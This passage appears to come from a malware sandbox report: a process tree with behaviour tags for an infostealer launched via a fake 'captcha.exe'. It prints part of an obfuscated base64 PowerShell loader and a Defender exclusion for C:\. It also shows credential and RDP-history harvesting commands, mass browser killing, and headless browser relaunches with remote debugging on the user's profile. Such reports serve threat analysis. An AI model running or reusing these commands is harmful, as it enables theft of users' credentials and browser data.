d3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:4084 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2447497384.txt\""4⤵
- NTFS ADS
PID:1676
-
-
C:\Windows\system32\net.exe"net" statistics workstation4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation5⤵PID:1168
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵PID:4416
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3668 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵PID:3848
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵PID:492
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:4068
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵PID:4716
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:4388
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:3224
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
PID:4468
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
- Kills process with taskkill
PID:4220
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:3264
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
- Kills process with taskkill
PID:2800
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵PID:4544
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
PID:2684
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵PID:1020
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
- Kills process with taskkill
PID:4844
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
PID:2628
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
- Kills process with taskkill
PID:4780
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
- Kills process with taskkill
PID:4292
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
PID:2600
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
- Kills process with taskkill
PID:3328
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:4772
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
- Kills process with taskkill
PID:2392
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
PID:3664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41611 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4716 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaab51dcf8,0x7ffaab51dd04,0x7ffaab51dd105⤵PID:1420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2468,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2460 /prefetch:25⤵
- Modifies registry class
PID:2600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2388,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2200 /prefetch:35⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2944,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2936 /prefetch:85⤵PID:1344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=1652,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2428 /prefetch:15⤵
- Uses browser remote debugging
PID:4048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2956 /prefetch:15⤵
- Uses browser remote debugging
PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2860,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:15⤵
- Uses browser remote debugging
PID:3852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4536,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4532 /prefetch:85⤵PID:5504
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
PID:6068
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:6132
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41460 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:808 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x354,0x7ffaace1f208,0x7ffaace1f214,0x7ffaace1f2205⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=1996,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1988 /prefetch:25⤵
- Modifies registry class
PID:5636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2692,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:35⤵PID:5984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2840,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2852 /prefetch:85⤵PID:3080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3188,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:15⤵
- Uses browser remote debugging
PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:15⤵
- Uses browser remote debugging
PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4068,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:15⤵
- Uses browser remote debugging
PID:3848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:25⤵
- Uses browser remote debugging
PID:3240
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
PID:3152
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Kills process with taskkill
PID:6220
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
PID:6332
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
PID:6396
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Kills process with taskkill
PID:6456
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:6532
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
PID:5448
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵PID:6756
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
PID:6848
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵PID:2144
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
PID:3524
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵PID:5848
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Kills process with taskkill
PID:2256
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
- Kills process with taskkill
PID:2672
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Kills process with taskkill
PID:5356
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
- Kills process with taskkill
PID:5660
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:4032
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵PID:6092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3152
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:4672
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:6324
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵PID:6384
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
- Kills process with taskkill
PID:2956
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:2712
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
- Kills process with taskkill
PID:6116
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
- Kills process with taskkill
PID:6412
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
PID:6504
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
- Kills process with taskkill
PID:5312
-
-
